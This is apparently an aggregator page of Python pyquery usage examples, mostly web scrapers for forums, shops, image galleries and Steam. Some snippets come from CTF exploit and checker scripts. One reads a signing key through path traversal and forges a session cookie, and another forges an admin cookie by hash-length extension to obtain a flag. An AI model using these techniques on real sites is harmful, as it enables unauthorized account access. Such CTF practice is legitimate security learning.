Python PQ Beispiele, pyquery.PQ Python Beispiele

Beispiel #1

0

Datei anzeigen

    def write_bio_test(self):
        s = req.session()
        rs = s.get(self.url + 'login')
        html = rs.text
        token = self._get_token(html)
        x, y = self._get_answer(html)
        rs = s.post(url=self.url + 'login',
                    data={
                        self.csrfname: token,
                        "username": "******",
                        "password": "******",
                        "captcha_x": x,
                        "captcha_y": y
                    })

        rs = s.get(self.url + 'user')
        html = rs.text

        token = self._get_token(html)
        rs = s.post(self.url + "user",
                    data={
                        csrfname: token,
                        "bio": "Too Young Too Simple"
                    })

        dom = PQ(rs.text)
        success = dom("div.alert.alert-success")
        success = PQ(success).text().strip()
        if len(success):
            print "[+] Write Bio Success"
            return True
        print "[-] Write Bio Failed"
        return False

Beispiel #2

0

Datei anzeigen

    def analyse_detail_page(self, html):
        pq = PQ(html)
        div = pq('.main')
        title = div('.QTitle a').text()
        question = div('.Content>.detail').text()
        tags = list(PQ(a).text() for a in div('#tags_nav a'))
        answers = list()
        for li in pq('.QuestionReplies li'):
            li = PQ(li)
            answer_content = li('.body .detail').text()
            vote_div = PQ(li.prev('div'))
            answer_accepted = True if vote_div('.accept-on') else False
            answers.append((answer_content, answer_accepted))
        try:
            text = pq('div[class="Asker special"] .pinfo>span:eq(1)').text()
            count_answer, count_view = re.search(u'(\d+) \u56de/(\d+)\u9605',
                                                 text).groups()
        except:
            count_answer = 0
            count_view = 1

        return dict(title=title,
                    content=question,
                    tags=tags,
                    answers=answers,
                    count_answer=count_answer,
                    count_view=count_view)

Beispiel #3

0

Datei anzeigen

Datei: test.py Projekt: woodstone121/pycrawler

    def _process(self, page):
        pq = PQ(page)
        data = []
        products = pq('li.grid-tile')
        for product in products:
            foo = PQ(product)
            #origin_price = foo('.product-standard-price').text().replace('MSRP:', '').replace('$', '').strip()
            origin_price = re.findall('[\d\.]+',
                                      foo('.product-standard-price').text())
            sales_price = re.findall('[\d\.]+',
                                     foo('.product-sales-price').text())
            if not origin_price or not sales_price:
                continue
            data.append({
                'image': foo('img').attr('src'),
                'link': parse_url(foo('.name-link').attr('href')),
                'title': foo('.name-link').text(),
                'original_price': origin_price[0],
                'sales_price': sales_price[0]
            })

        data = {
            'website': 'carters',
            'currency': 'USD',
            'country': 'USA',
            'store_id': self.store_id,
            'data': json.dumps(data)
        }
        data.update(self._extra_kwargs)

        self._save(data)

Beispiel #4

0

Datei anzeigen

    def exp_make_cookie(self):
        url = "http://localhost:8233/static/../assets.key"

        req = urllib2.Request(url)

        res_data = urllib2.urlopen(req)
        key = res_data.read()

        tt = escape.native_str(
            create_signed_value(key,
                                'username',
                                'Jack_Ma',
                                version=None,
                                key_version=None))

        rs = self.session.get(self.url + 'login')
        html = rs.text
        token = self._get_token(html)
        x, y = self._get_answer(html)

        # rs = self.session.post(url=self.url + 'login', data={
        #     self.csrfname: token,
        #     "username": "******",
        # })
        cookie = {self.csrfname: token, "username": tt}
        rs = self.session.get(url=self.url + 'user', cookies=cookie)
        dom = PQ(rs.text)
        failed = dom('div')
        failed = PQ(failed).text().strip()

        flag = re.findall(r"flag=(.+?) if", failed)
        print flag

Beispiel #5

0

Datei anzeigen

def gettoken(html):
    token_name = "token"
    dom = PQ(html)
    form = dom("form")
    token = str(PQ(form)("input[name=\"%s\"]" %
                         token_name).attr("value")).strip()
    return token

Beispiel #6

0

Datei anzeigen

Datei: checker_1.py Projekt: X-Mallory/Web-Security-examples

    def shopcar_add_test(self):

        rs = self.session.get(self.url + 'shop')

        dom = PQ(rs.text)

        form = dom("form")

        token = str(
            PQ(form[0])("input[name=\"%s\"]" %
                        self.csrfname).attr("value")).strip()

        rs = self.session.post(self.url + 'shopcar/add',
                               data={
                                   self.csrfname: token,
                                   'id': 1
                               })

        dom = PQ(rs.text)

        commodity = dom('div.shopcar_list')

        commodity = PQ(commodity).text().strip()

        if len(commodity):

            print '[+] Shopcar Add Success'

            return True

        print '[-] Shopcar Add Failed'

        return False

Beispiel #7

0

Datei anzeigen

Datei: Exp.py Projekt: gousaiyang/ciscn2018-sshop

def login(s, username, password, mail, csrfname, url):
    rs = s.get(url + 'login')
    html = rs.text
    token = get_token(html, csrfname)
    x, y = get_answer(html)
    rs = s.post(url=url + 'login',
                data={
                    csrfname: token,
                    "username": username,
                    "password": password,
                    "captcha_x": x,
                    "captcha_y": y
                })

    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Login failed."
            return False
    except:
        pass

    print "[+] Login Success."
    return True

Beispiel #8

0

Datei anzeigen

Datei: checker.py Projekt: forever404/everctf2018

 def register_test(self, invite=''):
     rs = self.session.get(self.url + 'register')
     html = rs.text
     token = self._get_token(html)
     x, y = self._get_answer(html)
     rs = self.session.post(url=self.url + 'register',
                            data={
                                self.csrfname: token,
                                "username": self.username,
                                "password": self.password,
                                "password_confirm": self.password,
                                "mail": self.mail,
                                "invite_user": invite,
                                "captcha_x": x,
                                "captcha_y": y,
                            })
     try:
         dom = PQ(rs.text)
         error = dom("div.alert.alert-danger")
         error = PQ(error).text().strip()
         if len(error):
             print "[-] Register failed."
             return False
     except:
         pass
     print "[+] Register Success."
     return True

Beispiel #9

0

Datei anzeigen

Datei: Exp.py Projekt: gousaiyang/ciscn2018-sshop

def register(s, username, password, mail, csrfname, url, invite=''):
    rs = s.get(url + 'register')
    html = rs.text
    token = get_token(html, csrfname)
    x, y = get_answer(html)
    rs = s.post(url=url + 'register',
                data={
                    csrfname: token,
                    "username": username,
                    "password": password,
                    "password_confirm": password,
                    "mail": mail,
                    "invite_user": invite,
                    "captcha_x": x,
                    "captcha_y": y,
                })

    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Register failed."
            return False
    except:
        pass

    print "[+] Register Success."
    return True

Beispiel #10

0

Datei anzeigen

 def _get_token(self, html):
     dom = PQ(html)
     form = dom("form")
     token = str(
         PQ(form)("input[name=\"%s\"]" %
                  self.csrfname).attr("value")).strip()
     return token

Beispiel #11

0

Datei anzeigen

def proc_item_list(q):
    keys = ['ruten', 'pchome']

    for k in keys:
        items = q('a[%s]' %
                  k).filter(lambda i: len(PQ(this).children('img')) == 0)
        if len(items) > 0:
            print 'found via key "%s"' % k
            break

    print 'total links found: %d' % len(items)

    if len(items) == 0:
        return -1

    c = 0
    for i in items:
        m = re.search(DISEL_TITLE, PQ(i).text())
        if not m:
            continue

        c += 1

        dt = {
            'style': m.group('STYLE'),
            'wash': m.group('WASH'),
            'url': PQ(i).attr('href')
        }

        # QUEUE.put(dt)
        proc_item(dt)
        # print dt

    return c

Beispiel #12

0

Datei anzeigen

 def login(self):
     rs = self.session.get(self.url + 'login')
     html = rs.text
     token = self._get_token(html)
     x, y = self._get_answer(html)
     rs = self.session.post(url=self.url + 'login',
                            data={
                                self.csrfname: token,
                                "username": self.username,
                                "password": self.password,
                                "captcha_x": x,
                                "captcha_y": y
                            })
     try:
         dom = PQ(rs.text)
         error = dom("div.alert.alert-danger")
         error = PQ(error).text().strip()
         if len(error):
             print "[-] Login failed."
             return False
     except:
         pass
     print "[+] Login Success."
     self.wallet = self._get_user_wallet()
     return True

Beispiel #13

0

Datei anzeigen

def get_album_page(album_id):
    album_url = "http://www.ugirls.com/Content/List/Magazine-%s.html" % album_id
    album_response = net.http_request(album_url, method="GET")
    result = {
        "image_url_list": [],  # 全部图片地址
        "is_delete": False,  # 是不是已经被删除
        "model_name": "",  # 模特名字
    }
    if album_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(album_response.status))
    if album_response.data.find("该页面不存在,或者已经被删除!") >= 0:
        result["is_delete"] = True
        return result
    # 获取模特名字
    model_name = PQ(album_response.data).find(
        "div.ren_head div.ren_head_c a").attr("title")
    if not model_name:
        raise crawler.CrawlerException("模特信息截取模特名字失败\n%s" %
                                       album_response.data)
    result["model_name"] = model_name.encode("UTF-8").strip()
    # 获取所有图片地址
    image_list_selector = PQ(album_response.data).find("ul#myGallery li img")
    if image_list_selector.length == 0:
        raise crawler.CrawlerException("页面匹配图片地址失败\n%s" % album_response.data)
    for image_index in range(0, image_list_selector.length):
        image_url = image_list_selector.eq(image_index).attr("src")
        if image_url.find("_magazine_web_m.") == -1:
            raise crawler.CrawlerException("图片地址不符合规则\n%s" % image_url)
        result["image_url_list"].append(
            image_url.replace("_magazine_web_m.", "_magazine_web_l."))
    return result

Beispiel #14

0

Datei anzeigen

Datei: checker_1.py Projekt: X-Mallory/Web-Security-examples

    def reset_password_test(self):

        res = self.session.get(self.url + 'pass/reset')

        html = res.text

        token = self._get_token(html)

        x, y = self._get_answer(html)

        rs = self.session.post(self.url + 'pass/reset',
                               data={
                                   self.csrfname: token,
                                   'mail': self.mail,
                                   "captcha_x": x,
                                   "captcha_y": y
                               })

        dom = PQ(rs.text)

        failed = dom('div.alert.alert-danger')

        failed = PQ(failed).text().strip()

        if len(failed):

            print '[-] Reset Password Failed'

            return True

        print '[+] Reset Password Success'

        return False

Beispiel #15

0

Datei anzeigen

Datei: zimuxia.py Projekt: DaZhiZi/chest

def parse_html(filename, download='磁力'):
    with open(filename, encoding='utf-8') as f:
        html_raw = f.read()
    html = PQ(html_raw)
    alist = html.find('a')
    for a in alist:
        if download in PQ(a).text():
            print(a.attrib['href'])

Beispiel #16

0

Datei anzeigen

 def extract_detail_url(self, html):
     pq = PQ(html)
     div = pq("div[class='question-detail']")
     hrefs = list()
     for a in div('a:eq(0)'):
         href = PQ(a).attr('href')
         hrefs.append(href)
     return hrefs

Beispiel #17

0

Datei anzeigen

def get_album_page(sub_path, page_count):
    album_pagination_url = "http://www.88mmw.com/%s/list_%s_%s.html" % (
        sub_path, SUB_PATH_LIST[sub_path], page_count)
    album_pagination_response = net.http_request(album_pagination_url,
                                                 method="GET")
    result = {
        "album_info_list": [],  # 全部图集信息
        "is_over": False,  # 是不是最后一页图集
    }
    if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(album_pagination_response.status))
    # 页面编码
    album_pagination_html = album_pagination_response.data.decode("GBK")
    # 获取图集信息，存在两种页面样式
    album_list_selector = PQ(album_pagination_html).find("div.xxx li a")
    if album_list_selector.length == 0:
        album_list_selector = PQ(album_pagination_html).find("div.yyy li a")
    if album_list_selector.length == 0:
        raise crawler.CrawlerException("页面截取图集列表失败\n%s" %
                                       album_pagination_html.encode("UTF-8"))
    for album_index in range(0, album_list_selector.length):
        result_album_info = {
            "album_title": "",  # 图集id
            "page_id": None,  # 图集页面id
        }
        album_selector = album_list_selector.eq(album_index)
        # 获取图集id
        album_url = album_selector.attr("href")
        if not album_url:
            raise crawler.CrawlerException(
                "图集列表截取图集地址失败\n%s" % album_selector.html().encode("UTF-8"))
        album_id = album_url.split("/")[-2]
        if not crawler.is_integer(album_id):
            raise crawler.CrawlerException("图集地址截取图集id失败\n%s" % str(album_url))
        result_album_info["page_id"] = album_id
        # 获取图集标题
        album_title = album_selector.attr("title").encode("UTF-8")
        if len(re.findall("_共\d*张", album_title)) == 1:
            result_album_info["album_title"] = album_title[:album_title.
                                                           rfind("_共")]
        else:
            result_album_info["album_title"] = album_title
        result["album_info_list"].append(result_album_info)
    # 判断是不是最后一页
    max_page_info = PQ(album_pagination_html).find("div.page a").eq(-1).text()
    if not max_page_info:
        raise crawler.CrawlerException("总页数信息截取失败\n%s" %
                                       album_pagination_html.encode("UTF-8"))
    max_page_count = tool.find_sub_string(max_page_info.encode("UTF-8"), "共",
                                          "页")
    if not crawler.is_integer(max_page_count):
        raise crawler.CrawlerException("总页数截取失败\n%s" %
                                       max_page_info.encode("UTF-8"))
    result["is_over"] = page_count >= int(max_page_count)
    return result

Beispiel #18

0

Datei anzeigen

Datei: crawl_iteye.py Projekt: lilang001/my_python

 def extract_detail_url(self, html):
     pq = PQ(html)
     div = pq("div[class='question-summary']")
     hrefs = list()
     for a in div('h3 a'):
         href = PQ(a).attr('href')
         if href.startswith('/'):
             href = self.BASE_URL + href
         hrefs.append(href)
     return hrefs

Beispiel #19

0

Datei anzeigen

Datei: rosario.py Projekt: marioferreyra/cuandollegabot

    def getBusArray(self):
        page = PQ(self.URL_DATA)
        array_buttons = []
        selectList = PQ('#linea', page)('option')
        for option in selectList:
            bus = PQ(option).attr('idlinea')
            if bus:
                array_buttons.append([PQ(option).text()])

        return array_buttons

Beispiel #20

0

Datei anzeigen

Datei: youzi.py Projekt: zhoushuqiang/PyCrawler

def get_album_page(album_id):
    page_count = max_page_count = 1
    result = {
        "album_title": "",  # 图集标题
        "image_url_list": [],  # 全部图片地址
        "is_delete": False,  # 是不是已经被删除
    }
    while page_count <= max_page_count:
        album_pagination_url = "http://www.youzi4.cc/mm/%s/%s_%s.html" % (
            album_id, album_id, page_count)
        album_pagination_response = net.http_request(album_pagination_url,
                                                     method="GET")
        if album_pagination_response.status == 404 and page_count == 1:
            result["is_delete"] = True
            return result
        if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
            raise crawler.CrawlerException(
                "第%s页 " % page_count +
                crawler.request_failre(album_pagination_response.status))
        # 判断图集是否已经被删除
        if page_count == 1:
            # 获取图集标题
            album_title = PQ(album_pagination_response.data.decode(
                "UTF-8")).find("meta[name='description']").attr("content")
            if not album_title:
                raise crawler.CrawlerException("页面截取标题失败\n%s" %
                                               album_pagination_response.data)
            result["album_title"] = album_title.encode("UTF-8")
        # 获取图集图片地址
        image_list_selector = PQ(
            album_pagination_response.data).find("div.articleV4Body a img")
        if image_list_selector.length == 0:
            raise crawler.CrawlerException(
                "第%s页 页面匹配图片地址失败\n%s" %
                (page_count, album_pagination_response.data))
        for image_index in range(0, image_list_selector.length):
            result["image_url_list"].append(
                str(image_list_selector.eq(image_index).attr("src")))
        # 获取总页数
        pagination_list_selector = PQ(
            album_pagination_response.data).find("ul.articleV4Page a.page-a")
        if pagination_list_selector.length > 0:
            for pagination_index in range(0, pagination_list_selector.length):
                temp_page_count = pagination_list_selector.eq(
                    pagination_index).html()
                if crawler.is_integer(temp_page_count):
                    max_page_count = max(int(temp_page_count), max_page_count)
        else:
            if page_count > 1:
                raise crawler.CrawlerException(
                    "第%s页 页面匹配分页信息失败\n%s" %
                    (page_count, album_pagination_response.data))
        page_count += 1
    return result

Beispiel #21

0

Datei anzeigen

Datei: Exp.py Projekt: gousaiyang/ciscn2018-sshop

def write_bio(s, payload, csrfname, url):
    rs = s.get(url + 'user')
    html = rs.text
    token = get_token(html, csrfname)
    rs = s.post(url + "user", data={csrfname: token, "bio": payload})
    dom = PQ(rs.text)
    success = dom("div.alert.alert-success")
    success = PQ(success).text().strip()
    if len(success):
        print "[+] Write Bio Success"
        return True
    return False

Beispiel #22

0

Datei anzeigen

Datei: rosario.py Projekt: marioferreyra/cuandollegabot

 def getBusFirstStreet(self, bus):
     page = PQ(self.URL_DATA)
     array_buttons = []
     selectList = PQ('#linea', page)('option')
     for option in selectList:
         bus_number = PQ(option).text()
         if bus_number == str(bus):
             idLinea = PQ(option).attr('idlinea')
             print(idLinea)
     data = {"accion": self.ACTION_FIRST_STREET, "idLinea": idLinea}
     r = requests.post(self.URL_ACTION, data=data)
     for street in loads(r._content.decode("utf-8-sig").encode("utf-8")):
         array_buttons.append([street["desc"]])
     return array_buttons

Beispiel #23

0

Datei anzeigen

Datei: bcy.py Projekt: muzidudu/PyCrawler

def get_one_page_album(account_id, page_count):
    # http://bcy.net/u/50220/post/cos?&p=1
    album_pagination_url = "http://bcy.net/u/%s/post/cos" % account_id
    query_data = {"p": page_count}
    album_pagination_response = net.http_request(album_pagination_url, method="GET", fields=query_data)
    result = {
        "album_info_list": [],  # 全部作品信息
        "coser_id": None,  # coser id
        "is_over": False,  # 是不是最后一页作品
    }
    if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(crawler.request_failre(album_pagination_response.status))
    if page_count == 1 and album_pagination_response.data.find("<h2>用户不存在</h2>") >= 0:
        raise crawler.CrawlerException("账号不存在")
    # 获取coser id
    coser_id_find = re.findall('<a href="/coser/detail/([\d]+)/\$\{post.rp_id\}', album_pagination_response.data)
    if len(coser_id_find) != 1:
        raise crawler.CrawlerException("页面截取coser id失败\n%s" % album_pagination_response.data)
    if not crawler.is_integer(coser_id_find[0]):
        raise crawler.CrawlerException("页面截取coser id类型不正确\n%s" % album_pagination_response.data)
    result["coser_id"] = coser_id_find[0]
    # 获取作品信息
    album_list_selector = PQ(album_pagination_response.data.decode("UTF-8")).find("ul.l-grid__inner li.l-grid__item")
    for album_index in range(0, album_list_selector.size()):
        album_selector = album_list_selector.eq(album_index)
        result_album_info = {
            "album_id": None,  # 作品id
            "album_title": None,  # 作品标题
        }
        # 获取作品id
        album_url = album_selector.find(".postWorkCard__img a.postWorkCard__link").attr("href")
        if not album_url:
            raise crawler.CrawlerException("作品信息截取作品地址失败\n%s" % album_selector.html().encode("UTF-8"))
        album_id = str(album_url).split("/")[-1]
        if not crawler.is_integer(album_id):
            raise crawler.CrawlerException("作品地址 %s 截取作品id失败\n%s" % (album_url, album_selector.html().encode("UTF-8")))
        result_album_info['album_id'] = album_id
        # 获取作品标题
        album_title = album_selector.find(".postWorkCard__img img").attr("alt")
        result_album_info["album_title"] = str(album_title.encode("UTF-8"))
        result["album_info_list"].append(result_album_info)
    # 判断是不是最后一页
    last_pagination_selector = PQ(album_pagination_response.data).find("#js-showPagination ul.pager li:last a")
    if last_pagination_selector.size() == 1:
        max_page_count = int(last_pagination_selector.attr("href").strip().split("&p=")[-1])
        result["is_over"] = page_count >= max_page_count
    else:
        result["is_over"] = True
    return result

Beispiel #24

0

Datei anzeigen

Datei: checker.py Projekt: gsfish/ciscn2018-earthdog

 def shopcar_add_test(self):
     rs = self.session.get(self.url + 'shop/')
     token = self._get_token(rs.text)
     rs = self.session.post(self.url + 'shopcar/add/', data={
         self.csrfname: token,
         'id': random.randint(1, 100)
     })
     dom = PQ(rs.text)
     commodity = dom('div.shopcar_list')
     commodity = PQ(commodity).text().strip()
     if len(commodity):
         print '[+] Shopcar Add Success'
         return True
     print '[-] Shopcar Add Failed'
     return False

Beispiel #25

0

Datei anzeigen

def getflag(host, port):
    wc = WebChecker(str(host), str(port))
    wc.register()
    cookies = wc.login()
    gg = hashpump(cookies['user_cookie'], wc.username, 'vip',
                  int(cookies['secretkey_length']))
    cookies['user_cookie'] = gg[0]
    cookies['username'] = gg[1].encode('hex')
    se = req.session()
    url = 'http://%s:%s/' % (host, port)
    rs = se.get(url + 'user', cookies=cookies)
    dom = PQ(rs.text)
    flag = dom("div.alert.alert-success")
    flag = PQ(flag).text().strip()
    print flag

Beispiel #26

0

Datei anzeigen

Datei: 小说.py Projekt: qianOU/inverse-case

def op_all_text(text):
    text = PQ(text)
    try:
        for item in text('div.index_toplist').items():
            t = item('.toptab span').text().split()[0]
            format1 = '{}的{}'
            p = list(
                zip([i for i in item('.tabRight').text() if i != ' '],
                    [i.attr('id')[-1]
                     for i in item('.tabRight span').items()]))
            for ul in item('.topbooks ul').items():
                for name, num in p:
                    a = {'排行榜': t}
                    if num == ul.parent().attr('id')[-1]:
                        a['排行榜'] = format1.format(name, t)
                        p1 = 1
                        for li in ul('li').items():
                            a['更新日期'] = li('.hits').text()
                            a['排名'] = li('.num').text()
                            a['作品'] = li('a').text()
                            a['作品链接'] = 'https://www.qu.la' + li('a').attr(
                                'href')
                            yield a, p1
                            a = {}
                            p1 = 0
                    else:
                        continue
    except:
        print('op_all_text has an error!')

Beispiel #27

0

Datei anzeigen

Datei: 小说.py Projekt: qianOU/inverse-case

def get_book(list1):
    """
    list1:由书名，书链接，所在排行榜组成的字典
    目的是得到每一本书的所有章节并写入相关文件中
    """
    text = get_url(list1['href'])
    text = PQ(text)
    text = text('div#list')
    t = 0  #只是为了测试
    for dd in text('dd').items():
        try:
            #只是为了测试
            if 'book' in dd('a').attr('href'):
                t += 1
                print(list1)
                if t == 8:
                    break
                write_one_chapter('https://www.qu.la' + dd('a').attr('href'),
                                  list1)
                if t == 4:  #只是为了测试
                    return  #只是为了测试
        except:
            print('get_book has a problem!')

            continue

Beispiel #28

0

Datei anzeigen

Datei: steamCommon.py Projekt: zhoushuqiang/PyCrawler

def get_market_game_trade_card_price(game_id, login_cookie):
    cookies_list = {"steamLogin": login_cookie}
    market_search_url = "http://steamcommunity.com/market/search/render/"
    market_search_url += "?query=&count=20&appid=753&category_753_Game[0]=tag_app_%s&category_753_cardborder[0]=tag_cardborder_0" % game_id
    market_search_response = net.http_request(market_search_url,
                                              method="GET",
                                              cookies_list=cookies_list,
                                              json_decode=True)
    if market_search_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(market_search_response.status))
    market_item_list = {}
    if not crawler.check_sub_key(
        ("success", "results_html"), market_search_response.json_data):
        raise crawler.CrawlerException(
            "返回信息'success'或'results_html'字段不存在\n%s" %
            market_search_response.json_data)
    if market_search_response.json_data["success"] is not True:
        raise crawler.CrawlerException("返回信息'success'字段取值不正确\n%s" %
                                       market_search_response.json_data)
    card_selector = PQ(market_search_response.json_data["results_html"]).find(
        ".market_listing_row_link")
    for index in range(0, card_selector.length):
        card_name = card_selector.eq(index).find(
            ".market_listing_item_name").text()
        card_min_price = card_selector.eq(index).find(
            "span.normal_price span.normal_price").text().encode(
                "UTF-8").replace("¥ ", "")
        market_item_list[card_name] = card_min_price
    # {'Pamu': '1.77', 'Fumi (Trading Card)': '2.14', 'Mio (Trading Card)': '1.33', 'Bonnibel (Trading Card)': '1.49', 'Groupshot': '1.87', 'Q-Piddy': '1.35', 'Elle (Trading Card)': '1.19', 'Quill': '1.50', 'Iro (Trading Card)': '1.42', 'Bearverly (Trading Card)': '1.27', 'Cassie (Trading Card)': '1.35'}
    return market_item_list

Beispiel #29

0

Datei anzeigen

Datei: steamCommon.py Projekt: zhoushuqiang/PyCrawler

def get_self_account_badges(account_id, login_cookie):
    # 徽章第一页
    badges_index_url = "http://steamcommunity.com/profiles/%s/badges/" % account_id
    cookies_list = {"steamLogin": login_cookie}
    badges_index_response = net.http_request(badges_index_url,
                                             method="GET",
                                             cookies_list=cookies_list)
    if badges_index_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(badges_index_response.status))
    badges_detail_url_list = []
    # 徽章div
    badges_selector = PQ(badges_index_response.data).find(
        ".maincontent .badges_sheet .badge_row")
    for index in range(0, badges_selector.length):
        badge_html = badges_selector.eq(index).html().encode("UTF-8")
        # 已经掉落全部卡牌的徽章
        if badge_html.find("无剩余卡牌掉落") >= 0:
            # 徽章详细信息页面地址
            badge_detail_url = tool.find_sub_string(
                badge_html, '<a class="badge_row_overlay" href="', '"/>')
            if not badge_detail_url:
                raise crawler.CrawlerException("徽章信息截取徽章详细界面地址失败\n%s" %
                                               badge_html)
            badges_detail_url_list.append(badge_detail_url)
    # ['http://steamcommunity.com/profiles/76561198172925593/gamecards/459820/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/357200/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/502740/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359600/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/354380/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359670/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/525300/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/337980/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/591420/']
    return badges_detail_url_list

Beispiel #30

0

Datei anzeigen

Datei: getMemberList.py Projekt: zhoushuqiang/PyCrawler

def get_one_page_account(page_count):
    account_pagination_url = "http://jigadori.fkoji.com/users"
    query_data = {"p": page_count}
    account_pagination_response = net.http_request(account_pagination_url,
                                                   method="GET",
                                                   fields=query_data)
    pagination_account_list = {}
    if account_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        crawler.CrawlerException(
            crawler.request_failre(account_pagination_response.status))
    account_list_selector = PQ(account_pagination_response.data.decode(
        "UTF-8")).find(".users-list li")
    for account_index in range(0, account_list_selector.length):
        account_selector = account_list_selector.eq(account_index)
        # 获取成员名字
        account_name = account_selector.find(".profile-name").eq(0).text()
        if not account_name:
            account_name = ""
            # raise robot.CrawlerException("成员信息截取成员名字失败\n\%s" % account_selector.html().encode("UTF-8"))
        else:
            account_name = account_name.strip().encode("UTF-8")
        # 获取twitter账号
        account_id = account_selector.find(".screen-name a").text()
        if not account_id:
            raise crawler.CrawlerException(
                "成员信息截取twitter账号失败\n\%s" %
                account_selector.html().encode("UTF-8"))
        account_id = account_id.strip().replace("@", "")
        pagination_account_list[account_id] = account_name
    return pagination_account_list